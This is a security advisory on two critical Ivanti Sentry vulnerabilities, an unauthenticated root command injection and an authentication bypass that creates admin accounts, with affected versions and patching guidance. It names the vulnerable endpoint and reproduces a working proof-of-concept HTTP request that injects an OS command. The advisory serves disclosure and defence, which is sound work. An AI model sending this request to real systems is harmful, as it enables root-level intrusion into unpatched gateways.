Remote Code Execution and Unauthorized Admin Account Creation in Ivanti Sentry Expose Critical Security Risks

Summary

On June 9, 2026, Ivanti released a security advisory detailing two critical vulnerabilities in its Sentry product, formerly known as MobileIron Sentry. The most severe vulnerability (CVE-2026-10520) allows remote unauthenticated users to execute arbitrary commands with root privileges due to an OS command injection flaw. A second vulnerability (CVE-2026-10523) permits attackers to bypass authentication and create administrative accounts. Ivanti has not reported any known exploitation of these vulnerabilities at the time of disclosure, but given their critical nature and the availability of a public proof-of-concept exploit, organizations are advised to prioritize patching.

What Happened

Ivanti Sentry, an in-line gateway for managing mobile device traffic within enterprise systems, is vulnerable due to two critical security flaws. The first vulnerability, CVE-2026-10520, involves an OS command injection flaw with a CVSS score of 10.0. This flaw allows attackers to execute arbitrary commands as root on affected systems without authentication. The second vulnerability, CVE-2026-10523, scores 9.9 on the CVSS scale and enables unauthenticated attackers to create administrative accounts, granting full access.

Technical Details

The OS command injection vulnerability (CVE-2026-10520) resides in the ConfigServiceController class of the Sentry web application. Attackers can exploit this by sending a POST request to an unauthenticated endpoint (/mics/api/v2/sentry/mics-config/handleMessage). This allows attackers to inject and execute arbitrary OS commands with root privileges.

The authentication bypass vulnerability (CVE-2026-10523) also resides within the same application, allowing attackers to create administrative accounts without needing valid credentials. Both vulnerabilities are present in versions before R10.5.2, R10.6.2, and R10.7.1 of Ivanti Sentry.

Proof of Concept

A public proof-of-concept exploit for CVE-2026-10520 is available at watchTowr's GitHub repository. This PoC demonstrates how an attacker can execute commands on a vulnerable system. Below is an example of the HTTP request used in the proof-of-concept:

POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1
Host: [redacted]
User-Agent: python-requests/2.33.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161

message=execute+system+%2Fconfiguration%2Fsystem%2Fcommandexec+%3Ccommandexec%3E%3Cindex%3E1%3C%2Findex%3E%3Creqandres%3Eid%3C%2Freqandres%3E%3C%2Fcommandexec%3E

This PoC allows attackers to execute system commands such as uname -a on affected systems, confirming the vulnerability's exploitability.

Affected Products and Fixed Versions

The vulnerabilities affect Ivanti Sentry versions before R10.5.2, R10.6.2, and R10.7.1. Organizations running these versions should update to one of the fixed releases to mitigate the risks associated with these critical vulnerabilities.

Exploitation Status

While no known exploitation has been reported by Ivanti at the time of disclosure, the availability of a public proof-of-concept exploit increases the likelihood of active exploitation in-the-wild. Organizations are strongly advised to act swiftly to update their systems and prevent potential attacks.

What Remains Unclear

The extent of potential exploitation remains unclear as no specific incidents have been reported by Ivanti. Additionally, details on how widespread the deployment of affected versions is across organizations remain unknown, which could impact the urgency and scale of required remediation efforts.

Defender Guidance

Organizations should immediately update their Ivanti Sentry installations to versions R10.5.2, R10.6.2, or R10.7.1 to mitigate these vulnerabilities. Additionally, they should monitor for any signs of unauthorized access or unusual activity on affected systems and consider conducting a security audit to ensure no exploitation has occurred prior to patching.